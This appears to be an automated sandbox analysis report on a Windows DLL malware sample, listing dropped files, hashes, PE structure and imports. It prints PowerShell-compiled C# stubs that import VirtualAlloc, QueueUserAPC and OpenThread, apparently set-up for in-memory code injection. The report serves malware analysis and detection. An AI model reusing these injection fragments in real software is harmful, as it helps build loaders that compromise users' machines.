                                      Size (bytes):1328
                                      Entropy (8bit):3.985489714311352
                                      Encrypted:false
                                      SSDEEP:24:Hre9ERhfpaDfHVhKdNWI+ycuZhNPHqakSGHbPNnq9qd:LSjKd41ulPqa30Rq9K
                                      MD5:67C978F8F6E761129B658BABBAC2C0E3
                                      SHA1:02E6453D6EA95F5A0EBB0631D927EE771F4B7B0A
                                      SHA-256:9BB6FB8D9FDC155D50F117D1CE410A264593B74F41FEA700ED29099228FA1C4A
                                      SHA-512:78B24238F9F3B4FCF3507F65C29D5F7BA58EBD9866A22239C476D50CDF207B93030B71584F41784CBB2DECB40C888689A5C7BD9953555770ACCCA9954B5A23BD
                                      Malicious:false
                                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP.................a.....-...`.~............4.......C:\Users\user\AppData\Local\Temp\RES2392.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                      C:\Users\user\AppData\Local\Temp\RES3B60.tmp

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                      Category:dropped
                                      Size (bytes):1328
                                      Entropy (8bit):3.965326095070505
                                      Encrypted:false
                                      SSDEEP:24:HJe9EuZfTDQDfHLWhKdNWI+ycuZhNsrakSPEPNnq9qd:ABTqrMKd41ulsra3PEq9K
                                      MD5:E34239A621ECB61A5F50016AE522485A
                                      SHA1:EDD24063A2BC018FA0F98951A747630C5925D5FE
                                      SHA-256:E0F555AAE679A2E77185A2DAD637DAD6F1477AEA45415837C204061570AC891E
                                      SHA-512:5DBA844206EEA3E6E4EC60343E5AA08271F863EC568A169E9EB0904C0D4979CDC5435999ABA05E08CF6AD6DC29078C89CF6C0AC8509D7C3CB4DBEB7D60DECED1
                                      Malicious:false
                                      Preview:L....cb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP.................sf.]..E`W`..<............4.......C:\Users\user\AppData\Local\Temp\RES3B60.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4tlk4n5.iwk.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldp1b5en.1s3.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1

                                      C:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.0806512987018424
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKrak7YnqqPEPN5Dlq5J:+RI+ycuZhNsrakSPEPNnqX
                                      MD5:8C7366A75D058E4560576098B53C2E89
                                      SHA1:5474E9C863C4BB1B86DA13FEB1DCBAC13BEA6A83
                                      SHA-256:045887EA02E67AD0120E0D470B59C58099BFDBA859F1F3E31989AE8800BC7765
                                      SHA-512:CDA6B16F3E42B84FB648CD74482E2B7C4B9E2EB463F8D24A96E3893AD7667D9CBC094AE597AF695AD032ADA6CADE89F3E891EC2F6896966882516BBE7DBC3BF1
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text
                                      Category:dropped
                                      Size (bytes):417
                                      Entropy (8bit):5.038440975503667
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                                      MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                                      SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                                      SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                                      SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.

                                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                      Category:dropped
                                      Size (bytes):369
                                      Entropy (8bit):5.246210484932597
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbNOzxs7+AEszIwkn23fbNYA:p37Lvkmb6KRfT4WZEifT1
                                      MD5:1DFF526FD701241566C75FC5465D31AF
                                      SHA1:5D91CBBE8D1F790F3A38CE35DAB4F705A0BEEF6E
                                      SHA-256:ED2CAE80D53441FB70A3307AEB276D80C5D4176F9A9D336B5C87305DC0064ACF
                                      SHA-512:E38E5E1D62A47ACAE2F46256453F82352BD5A6AF881D21EB8EC317AB60B4AE452E95E018271A9DD44FA9176799BFE8FB05E5359AF14399820DF6EDAECE85B2D5
                                      Malicious:false
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"

                                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.6501357671778076
                                      Encrypted:false
                                      SSDEEP:24:etGSzMWWOJy853Ek0s2E7OgDdWQzbtkZfkd2OWI+ycuZhNsrakSPEPNnq:6pvz5UkGE7vxWQzqJkd211ulsra3PEq
                                      MD5:0DB7703243576F0A4B5D43BDB20FD12B
                                      SHA1:67974086EB1D388F41FA3D91AB2BE5C6EE06D2CF
                                      SHA-256:6B514B672F123A4399CAE02C921B046A1FC00D0A01C34B758A7D14F92E1C8BE1
                                      SHA-512:0962E8886173F666E25787071C9794A4A158FAC0226AE3B19E9E954EC2088268172F1F4AE23671A74BF47E715048082E3E7904B32C5EAF74B0EBBE30A6117A2F
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....*BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d.......*.....3.D.....=.......O.......W...........

                                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.out

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):866
                                      Entropy (8bit):5.325866700512367
                                      Encrypted:false
                                      SSDEEP:24:AId3ka6KRfTJEifTQKaM5DqBVKVrdFAMBJTH:Akka6CTJEuTQKxDcVKdBJj
                                      MD5:EE4CA1452DEB397DB57596D3E6012A15
                                      SHA1:E8C4E64E4E2C6AE91EB3B78C460A8D65FB9377EA
                                      SHA-256:102035269C1F6AC6AECEC5D33A268EDB5A33E3BBA56F775441E271EF9C71A7CC
                                      SHA-512:EBEB340BC62C181C89B1694C8DBB2D55326A7F19D987686A5A0F7E1B0A59A2824E488CFDD710F2FFABD8683F8038E0FA5163929004F631216B1EA355FD11BE35
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                      C:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.089404989746942
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Hqak7YnqqGHbPN5Dlq5J:+RI+ycuZhNPHqakSGHbPNnqX
                                      MD5:611F888895B72D1096C460FF7EA5E4B7
                                      SHA1:67CCD8B6129567C2A7CF8B601FD2709FA13D13D0
                                      SHA-256:FFF630440C6AC27F1A70771D2279FE270829A76357941949BA22EB16BD260D6F
                                      SHA-512:0FB11E6584AA80780E1C263285F568A6C77773F35D7A3724692C2B8DD0A0E52D3A8CAA2D4F434F69109650B9243DC474C8EA2BD5C157C8734C297E5584912CA6
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text
                                      Category:dropped
                                      Size (bytes):411
                                      Entropy (8bit):5.082169696837192
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                                      MD5:248E15CD19191D4333303E0E1F8E9A70
                                      SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
                                      SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                                      SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yifpgxqqbj. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);.. }..}.

                                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                      Category:dropped
                                      Size (bytes):369
                                      Entropy (8bit):5.22267238940763
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftUsX0zxs7+AEszIwkn23ftUs2WH:p37Lvkmb6KRf2sEWZEif2sxH
                                      MD5:7261F6CD6A6D4860AC034E27509DC55F
                                      SHA1:C1282BE561B76009A43FD5BC192CE9D76AF08272
                                      SHA-256:F7F9574C754A9C5B3A633B90174E4FAC3FBB9D5657E79D07D9CAAF0BAA8FE5EA
                                      SHA-512:CBB1190E96E9929BD12DEB50F2916777C8B8845630DE251A733A49567E7DD290F27673B0918D30B4C6691A0142EEF8A4802D6123DC8BECE77E5CA943CD609813
                                      Malicious:false
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"

                                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.6369801237092227
                                      Encrypted:false
                                      SSDEEP:24:etGSh8+mUE7R853RY0kCGs+4I4tkZfmPqDZ0WI+ycuZhNPHqakSGHbPNnq:63XE7S505Jm0ZX1ulPqa30Rq
                                      MD5:21F3C262E8990FE0E1A44D58B448B899
                                      SHA1:2CD298766EC3E59F36C316B35BB0728368117153
                                      SHA-256:D594A1A6D450503AB6BDDC352174CC5F680F84CBEEAC0483BB064BA27CB381F0
                                      SHA-512:2975E0F079F3D0360854A1249B7A1FBAB7AE5EA851F3A6924302135C03A8DA9E44310CA7E9D82BC672C67755A121B01016B680FE97B060384C3EECF3EE9F9C23
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......]...........

                                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.out

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):866
                                      Entropy (8bit):5.327904541660146
                                      Encrypted:false
                                      SSDEEP:24:AId3ka6KRf2SEif2eOKaM5DqBVKVrdFAMBJTH:Akka6C2SEu2eOKxDcVKdBJj
                                      MD5:51149F7278FBC7AB67B11D6B7BF38CF0
                                      SHA1:15D9E224C099E0795568A20DAFACEEA4BF50D88A
                                      SHA-256:6477E4EF8AF1EEA40F7734141A2CA95216DCD1BC01C53397ADBEABD2913543CB
                                      SHA-512:DCB5699FB0966FF9D79A08AB874CDC2106FD74133878789C469A2EA31970A4B4FBBA138916763DF2C0EAEC64D45120E5A17D1EB5DA7B2D876098DBB4ACED025C
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                      Static File Info

                                      General

                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.112861669562404
                                      TrID:
                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                      • DOS Executable Generic (2002/1) 0.20%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:VoevdOQpeU.dll
                                      File size:640699
                                      MD5:ba155d8aed7ca303fcfc3f0248d218e1
                                      SHA1:600453c21cdbecdbea9c825df4754b8a1829d649
                                      SHA256:a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
                                      SHA512:5b58791e43d9fef57d3233ab015ea0609901ab5d7cc70b6a4d0291ea38e0082af06ba9a8996b6ac822d00f9dc3bf014bb5aabeebd5bf480f92e23372e0850582
                                      SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZB:+w1lEKOpuYxiwkkgjAN8ZB
                                      TLSH:12D4BD1A029B2102EBB6CE78A751636C54574CE09B01E2CFC9190DA395E34FBF4FA5ED
                                      File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................

                                      File Icon

                                      Icon Hash:74f0e4ecccdce0e4

                                      Static PE Info

                                      General

                                      Entrypoint:0x401023
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:fd1c62e6f93e304a27347077f6d2b44c

                                      Authenticode Signature

                                      Signature Valid:
                                      Signature Issuer:
                                      Signature Validation Error:
                                      Error Number:
                                      Not Before, Not After
                                        Subject Chain
                                          Version:
                                          Thumbprint MD5:
                                          Thumbprint SHA-1:
                                          Thumbprint SHA-256:
                                          Serial:

                                          Entrypoint Preview

                                          Instruction
                                          jmp 00007F89EC4AA38Dh
                                          jmp 00007F89EC4DAAF8h
                                          jmp 00007F89EC4AA073h
                                          jmp 00007F89EC4A9D2Eh
                                          jmp 00007F89EC4AA149h
                                          jmp 00007F89EC4A9B84h
                                          jmp 00007F89EC4DFF6Fh
                                          jmp 00007F89EC4A9C8Ah
                                          jmp 00007F89EC4D32E5h
                                          jmp 00007F89EC4E31A0h
                                          jmp 00007F89EC4DEE0Bh
                                          jmp 00007F89EC4E4366h
                                          jmp 00007F89EC4A9C01h
                                          jmp 00007F89EC4D441Ch
                                          jmp 00007F89EC4E6A37h
                                          jmp 00007F89EC4DDCE2h
                                          jmp 00007F89EC4D549Dh
                                          jmp 00007F89EC4AA0B8h
                                          jmp 00007F89EC4E99D3h
                                          jmp 00007F89EC4A9DDEh
                                          jmp 00007F89EC4E5599h
                                          jmp 00007F89EC4DBBC4h
                                          jmp 00007F89EC4D64AFh
                                          jmp 00007F89EC4E53BAh
                                          jmp 00007F89EC4AA055h
                                          jmp 00007F89EC4E0F90h
                                          jmp 00007F89EC4D89EBh
                                          jmp 00007F89EC4E8AF6h
                                          jmp 00007F89EC4D78B1h
                                          jmp 00007F89EC4AA04Ch
                                          jmp 00007F89EC4A9BC7h
                                          jmp 00007F89EC4E20D2h
                                          jmp 00007F89EC4E7A4Dh
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3

                                          Rich Headers

                                          Programming Language:
                                          • [ C ] VS2013 build 21005
                                          • [RES] VS2015 build 23026
                                          • [LNK] VS2013 UPD4 build 31101
                                          • [C++] VS2010 SP1 build 40219
                                          • [IMP] VS2012 UPD2 build 60315
                                          • [RES] VS2008 build 21022
                                          • [EXP] VS2015 UPD3.1 build 24215
                                          • [ C ] VS2012 UPD1 build 51106
                                          • [C++] VS2015 UPD3.1 build 24215

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x970000xc8.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x703.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x10000x1.text
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x990000x46b8.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x410010x38.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x9731c0x254.idata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x3f1700x40000False0.371898651123data4.44682748237IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x410000x4001b0x41000False0.805322265625data7.15716511851IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x820000x149570x12000False0.179578993056data5.40188601701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .idata0x970000xadd0x1000False0.217041015625data2.64887682924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rsrc0x980000x7030x1000False0.1220703125data1.10395588442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x990000x53a50x6000False0.152099609375data5.13419580461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0x981700x3d0data

                                          Imports

                                          DLLImport
                                          WINSPOOL.DRVGetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                                          msvcrt.dlltoupper
                                          USER32.dllDestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                                          OLEAUT32.dllLHashValOfNameSysA
                                          SHELL32.dllFindExecutableW
                                          KERNEL32.dlllstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                                          Secur32.dllInitializeSecurityContextW
                                          ADVAPI32.dllGetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
